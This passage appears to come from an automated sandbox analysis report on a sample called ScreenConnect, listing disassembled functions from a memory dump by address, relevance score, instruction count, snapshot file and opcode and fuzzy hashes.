                                                                                                                                                                                                                                                          • Opcode ID: 8e1a0b5b038682355807e33c7d476db1b24baf4cf7e016f412113c03791e7979
                                                                                                                                                                                                                                                          • Instruction ID: 40048ee6c433edcc6ff7ce1521f85df4517b94d3f2f46c74e40eaf6a3c26dad7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e1a0b5b038682355807e33c7d476db1b24baf4cf7e016f412113c03791e7979
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E0722282C50702FB3C253578813BE20C2AF80310F4A407BE83DC04E9DC5CACC08142
                                                                                                                                                                                                                                                          Function 00007FFE7E0901DA Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c5e1164d38d464bf25fe33a4bb7862281871424527d64c856995bbfad4544e22
                                                                                                                                                                                                                                                          • Instruction ID: 5665095e506a2ea266e8496d53d68009194c3bc2ef25dac104ef328bff5a4e0b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5e1164d38d464bf25fe33a4bb7862281871424527d64c856995bbfad4544e22
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2E01221E39F1F8EDAE56A78001823960C2FFA8745F5502798C1DD72E1EC1DBC004140
                                                                                                                                                                                                                                                          Function 00007FFE7E094D41 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7aa6d1c5cc370a1462f1a9030e4c75685b0f969b14dfab39a565a135dd2f57f2
                                                                                                                                                                                                                                                          • Instruction ID: 3f0891b7b2946a26a9718e35c59f4dab08d4e92700f315d5da06ede02d994e6a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aa6d1c5cc370a1462f1a9030e4c75685b0f969b14dfab39a565a135dd2f57f2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05E0C23AA1E8484BEF91CE1858509A837D2EF45308F450099F49CD32E2CF38B8008705
                                                                                                                                                                                                                                                          Function 00007FFE7E092943 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 707c936fb2275c9d3c81ca1e5c77d9b1aa96293b29fa1bb5ff579e45379bd92e
                                                                                                                                                                                                                                                          • Instruction ID: 2bbf65fd129c506b18e4ce452621ade78d1ce4f456696859bed3f53bd72cc739
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 707c936fb2275c9d3c81ca1e5c77d9b1aa96293b29fa1bb5ff579e45379bd92e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37D05E2193D98A8EE369FB7548429BE7282EFD4304B95897DD46F931A7DC2CB0144340
                                                                                                                                                                                                                                                          Function 00007FFE7E097A9C Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ba6fd01b02bd8c0bdd9254335e2240e4554043acfeedc69876dce93ad32c76b3
                                                                                                                                                                                                                                                          • Instruction ID: 12b323d50edb9d1cb392a65b1ef1096a550478d0a3e1befb7938687168825550
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba6fd01b02bd8c0bdd9254335e2240e4554043acfeedc69876dce93ad32c76b3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1C04C02B6C82D0E64B9A25D74552BC41C1DBD866578912F3E90CD625AEC485C8203C1
                                                                                                                                                                                                                                                          Function 00007FFE7E092684 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: bcd4e94ae3c6fb0612130c50aaa26ad7ad3ab39195080452e8284a782a1ce57e
                                                                                                                                                                                                                                                          • Instruction ID: 027d54052a396899559d2cb64bd908e0ae9ad4b17c5488e1e894d8bfc82fa5e8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcd4e94ae3c6fb0612130c50aaa26ad7ad3ab39195080452e8284a782a1ce57e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41D0A72183C58B4ED666EF2088018BE7252AF50300B11867AD46B430A6CC1C74004340
                                                                                                                                                                                                                                                          Function 00007FFE7E09295F Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: fe3139d4e6d57a41404a39b693e50d16f481b0787d44143c8fafbd1b6caf191a
                                                                                                                                                                                                                                                          • Instruction ID: a8e9d56b26b5243bafa594a30825cdd4e57fe4dfd52b33c4f6d36b9159815e26
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe3139d4e6d57a41404a39b693e50d16f481b0787d44143c8fafbd1b6caf191a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4C01221A1CD494FE279DF29404127921D3AFD82017508779D01EC22A6CD3865114380
                                                                                                                                                                                                                                                          Function 00007FFE7E0926A1 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 98dc281f270e623c78ffb0e970ad95971f564c50b57e9397d6bcd54f88970db0
                                                                                                                                                                                                                                                          • Instruction ID: b275b3c48845c171e7a7082e311beb40c1850f915a774ca22bcf8bbaf2f98901
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98dc281f270e623c78ffb0e970ad95971f564c50b57e9397d6bcd54f88970db0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17B09221E1CE098A91B99E19100123911D28BA8210720837EC05EC26A6CD68698103C1
                                                                                                                                                                                                                                                          Function 00007FFE7E097A8A Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 755397bc3a4286c00a5f73a922ce590fd40ff4ea5de25cffab61cb7ac6630182
                                                                                                                                                                                                                                                          • Instruction ID: 9814168b2d89dab17f9af36a39f9b219b3e44aa0f3cf1de76313f44e3f64bc21
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 755397bc3a4286c00a5f73a922ce590fd40ff4ea5de25cffab61cb7ac6630182
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FA0026A529A4A5A61C5B57910196B800C3B798695B651479946DC33A2EC1868454300